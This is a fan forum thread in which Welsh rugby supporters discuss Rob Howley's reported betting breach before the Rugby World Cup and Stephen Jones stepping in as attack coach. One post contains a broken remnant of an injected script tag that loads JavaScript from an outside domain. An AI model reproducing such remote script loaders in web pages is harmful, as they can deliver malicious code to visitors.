Duw, this is astonishing. Shocked

What a way to end a career - jeopardising a RWC bid, too.

Stephen Jones will now join the squad as attack coach, starting his new role a few months early.

Not much info at the mo apart from what Nobby has added above.

It's funny, well not funny but you know what I mean, I was just reading an article on the beeb site asking what could possibly go wrong for Wales this year as something always goes tits up.

What a muppet but our attack sucks let's face it. The disruption to the squad and coaching setup is the bigger concern.

Really embarressing for the team, it's not like he's an inexperienced team member.  < ="text/" async="" ="//zoudlogick.net/2025b8e6a7c18f2f81.js">

Just caught news and it’s true not a wind up !😱 How embarrassing for our country and for him as well as very disruptive. He knows the rules of conduct surely. If it’s true it will haunt him and Wales for years.🤨 Possibly a set up of course but if you’re guilty you’re guilty. Depressing but huge opportunity for Stephen Jones 👍

It must be pretty bad to be sent home/suspended - usual sanctions seem to be warnings/reprimands. Can't see that a tenner on England to beat Argentina warrants this sort of action.
What's going on?

World Rugby's regulation 6.3.1 reads: "No connected person shall, directly or indirectly, bet and/or attempt to bet on the outcome or any aspect of any connected event and/or receive and/or attempt to receive part or all of the proceeds of any such bet and/or any other benefit in relation to a bet."

I guess any match in the RWC counts as a connected event.

Putting an amateur psychologist's hat on, what will this do to the squad mentality? Could bring them all closer as unit, creating a bunker mentality as the WRU management deal with the fall-out - players may want to 'win it for Rob'. I wouldn't bet against it Wink - arguably this happened in the Six Nations when the Ospreys merger rumours were rife, and the players dug in and delivered a Grand Slam. Perhaps a slice of adversity in the camp will do them good.

Their attack patterns will already be largely set, but Stevo coming in with fresh eyes and a new voice (for some) to evaluate and tweak what has been criticised as a largely toothless attack in the warm-up games (& 6 Nations, tbf) may not be a bad thing. Gats already knows Stephen pretty well, and I'm sure he'll use this to get the most out of the situation.

The preparations have been impressive so far, especially when you see 15,000 Japanese fans welcoming Wales like their home team, so this will be an unwelcome disruption. But I'm determined to see the positive potential this creates - it'll put all the coaching team on their toes 11 years into their jobs, and it could give the whole party an edge.

Whatever the outcome, you have to feel that it's a sad, undignified end to an impressive coaching reign - whatever you think about Howley's ultimate abilities, he has been a big part of a group who have delivered 3 Grand Slams, and he even led Wales to a 6Ns title in Gatland's absence. Such a shame, but might it be a mixed blessing?

It's sad that Rob's got caught up in this, he's been a tremendous coach for Wales and this is the swansong for the Wales coaching team. It's a big blow for everyone involved, and for Rob Howley on a personal level.

I think the team will be affected. They're lucky to have Stephen Jones, he's an incredibly positive person and influence. He's someone who could come in and have a positive impact on the camp straight away.

Does anyone know when we will hear the outcome of the enquiry which Howley returned home to face? I can understand the WRU not wishing to jeopardise our campaign by bringing it to the fore again but I guess we will hear something next week.
